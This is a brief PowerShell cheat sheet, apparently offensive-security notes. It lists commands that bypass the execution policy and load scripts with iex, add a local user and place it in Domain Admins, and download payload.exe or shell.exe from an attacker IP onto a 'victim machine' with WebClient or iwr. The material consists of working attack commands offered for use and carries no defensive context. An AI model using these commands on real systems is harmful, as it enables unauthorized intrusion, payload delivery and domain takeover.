☄️Powershell Commands Cheat Sheet
Set-ExecutionPolicy Unrestricted ./file.ps1Import-Module script.psm1 Invoke-FunctionThatIsIntheModuleiex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”)
net user username "password" /ADDnet group "Domain Admins" %username% /DOMAIN /ADD
Download Files in Victim Machine
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<Attacker IP>:8080/payload.exe','payload.exe')"
OR
powershell iwr -Uri http://<IP>:<Port> -OutFile shell.exeLast updated